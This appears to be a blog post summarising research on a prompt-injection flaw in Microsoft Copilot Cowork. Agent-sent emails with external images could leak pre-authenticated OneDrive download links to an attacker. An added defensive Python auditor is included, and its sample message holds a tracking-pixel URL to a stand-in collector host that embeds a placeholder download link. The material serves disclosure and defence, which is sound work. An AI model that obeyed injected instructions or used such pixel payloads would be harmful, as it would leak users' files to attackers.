Microsoft Copilot Cowork Exfiltrates Files

Microsoft Copilot Cowork Exfiltrates Files (https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files)

The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case, Microsoft Copilot Cowork (yes, that’s a real product name (https://www.microsoft.com/en-us/microsoft-365/blog/2026/03/09/copilot-cowork-a-new-way-of-getting-work-done/)) was allowing agents to send emails to the user’s own inbox without approval… but those messages were then rendered in a way that could leak data to an attacker via rendered images:

Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.

Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
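As an added, defender-side illustration (this is example code, not code from PromptArmor, Microsoft or this post), here is a Python check an organisation could run over agent-composed HTML before it is delivered to a mailbox. It lists every reference that would make a mail client fetch from an external host on render (img src/srcset, background, poster, CSS url()), flags URLs whose query or path look like they carry data rather than just name an image (very long values, or a value that embeds another URL such as a share link), and replaces off-allowlist <img> tags with a visible placeholder. The allowlist host, the collector.invalid domain, the PLACEHOLDER token and the length threshold are all constructed for the example.

```python
"""Audit and sanitise agent-composed HTML messages for render-time exfiltration.

Added example, not the product's or the researchers' code. The point being
demonstrated: an external image reference is a network request the recipient
did not choose to make, so anything encoded into its URL leaves the tenant as
soon as the message is opened.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# Hosts a client may load images from without review. Constructed for the example.
ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.internal"}

# A query value or path segment at least this long is treated as a probable
# data carrier. The threshold is an assumption of this example, not a standard.
SUSPICIOUS_LEN = 64
LINK_LIKE = re.compile(r"https?%3a%2f%2f|https?://", re.IGNORECASE)


class _RemoteRefCollector(HTMLParser):
    """Collect every attribute value that would trigger a fetch when rendered."""

    REF_ATTRS = {"src", "srcset", "background", "poster"}

    def __init__(self):
        super().__init__()
        self.refs = []  # (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            if name in self.REF_ATTRS:
                # srcset holds comma-separated "url descriptor" candidates
                for candidate in value.split(","):
                    parts = candidate.split()
                    if parts:
                        self.refs.append((tag, name, parts[0]))
            elif name == "style":
                for url in re.findall(r"url\(\s*['\"]?([^'\")]+)", value, re.IGNORECASE):
                    self.refs.append((tag, "style", url))


def _normalize(url):
    """Protocol-relative URLs (//host/x) still leave the client; give them a scheme."""
    url = url.strip()
    return "https:" + url if url.startswith("//") else url


def is_external(url, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    parts = urlsplit(_normalize(url))
    if parts.scheme.lower() not in ("http", "https"):
        return False  # data: and cid: (inline attachments) do not reach the network
    return parts.hostname not in allowed_hosts


def classify_url(url):
    """Return reasons the URL looks like it carries data rather than just naming an image."""
    reasons = []
    parts = urlsplit(_normalize(url))
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) >= SUSPICIOUS_LEN:
            reasons.append(f"long query value in '{key}' ({len(value)} chars)")
        if LINK_LIKE.search(value):
            reasons.append(f"query value in '{key}' embeds another URL")
    for segment in parts.path.split("/"):
        if len(segment) >= SUSPICIOUS_LEN:
            reasons.append(f"long path segment ({len(segment)} chars)")
    return reasons


def audit_message(html, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """List every external fetch the message would cause on render, with suspicion reasons."""
    collector = _RemoteRefCollector()
    collector.feed(html)
    collector.close()
    return [
        {"tag": tag, "attr": attr, "url": url, "reasons": classify_url(url)}
        for tag, attr, url in collector.refs
        if is_external(url, allowed_hosts)
    ]


# Tag-level regex is enough for the example; a production filter should use a
# real HTML sanitiser so that a '>' inside an attribute cannot split the tag.
_IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE | re.DOTALL)


def strip_external_images(html, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Replace each <img> pointing off the allowlist with a visible placeholder."""

    def _replace(match):
        tag_collector = _RemoteRefCollector()
        tag_collector.feed(match.group(0))
        tag_collector.close()
        if any(is_external(u, allowed_hosts) for _, _, u in tag_collector.refs):
            return "[external image removed]"
        return match.group(0)

    return _IMG_TAG.sub(_replace, html)


# Constructed sample of an agent-composed message: one allowlisted logo, one
# tracking pixel whose query embeds a (placeholder) download link, one inline
# attachment, and a CSS background pointing at the same external host.
SAMPLE_MESSAGE = (
    "<html><body>"
    "<p>Here is the summary you asked for.</p>"
    '<img src="https://cdn.example-corp.internal/logo.png" alt="logo">'
    '<img src="https://collector.invalid/p.gif?u=https%3A%2F%2Ftenant.invalid%2Fdl%3Ftoken%3DPLACEHOLDER" width="1" height="1">'
    '<img src="cid:attachment-1@example">'
    '<div style="background:url(//collector.invalid/bg.png)"></div>'
    "</body></html>"
)

if __name__ == "__main__":
    for finding in audit_message(SAMPLE_MESSAGE):
        print(finding)
    print(strip_external_images(SAMPLE_MESSAGE))
```

The audit reports two external fetches in the sample (the pixel, flagged because its query embeds another URL, and the CSS background, which the stripper leaves alone because it only rewrites <img>). That gap is the design point: stripping images reduces exposure, but the safer policy for agent-generated mail is to hold any message whose audit list is non-empty for review, since every external reference is a request the recipient will make without intending to.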

Via Hacker News (https://news.ycombinator.com/item?id=48272354)

Tags: microsoft (https://simonwillison.net/tags/microsoft), security (https://simonwillison.net/tags/security), ai (https://simonwillison.net/tags/ai), prompt-injection (https://simonwillison.net/tags/prompt-injection), generative-ai (https://simonwillison.net/tags/generative-ai), llms (https://simonwillison.net/tags/llms), exfiltration-attacks (https://simonwillison.net/tags/exfiltration-attacks), lethal-trifecta (https://simonwillison.net/tags/lethal-trifecta)